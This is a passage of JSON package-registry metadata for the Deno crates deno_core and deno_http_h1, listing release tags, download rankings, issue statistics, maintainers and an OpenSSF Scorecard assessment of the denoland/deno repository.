l":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T21:39:40.338Z","dependent_packages_count":116,"downloads":7548706,"downloads_period":"total","dependent_repos_count":396,"rankings":{"downloads":2.4730015172701036,"dependent_repos_count":2.086246392764704,"dependent_packages_count":0.5392258947431053,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":5.070379236203458},"purl":"pkg:cargo/deno_core","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_core","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_core/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:23.282Z","updated_at":"2022-11-07T18:29:23.282Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"96431","login":"littledivy","name":"Divy Srivastava","email":null,"url":"https://github.com/littledivy","packages_count":37,"html_url":"https://crates.io/users/littledivy","role":null,"created_at":"2026-02-23T17:36:20.897Z","updated_at":"2026-02-23T17:36:20.897Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/littledivy/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.865Z","updated_at":"2023-07-18T22:41:23.865Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14616657,"name":"deno_http_h1","ecosystem":"cargo","description":"HTTP/1 protocol pieces for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2026-06-11T12:31:05.152Z","latest_release_published_at":"2026-08-27T15:21:53.161Z","latest_release_number":"0.9.0","last_synced_at":"2026-09-07T22:55:53.944Z","created_at":"2026-06-11T14:04:20.657Z","updated_at":"2026-09-08T21:47:36.248Z","registry_url":"https://crates.io/crates/deno_http_h1/","install_command":"cargo install deno_http_h1","documentation_url":"https://docs.rs/deno_http_h1/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 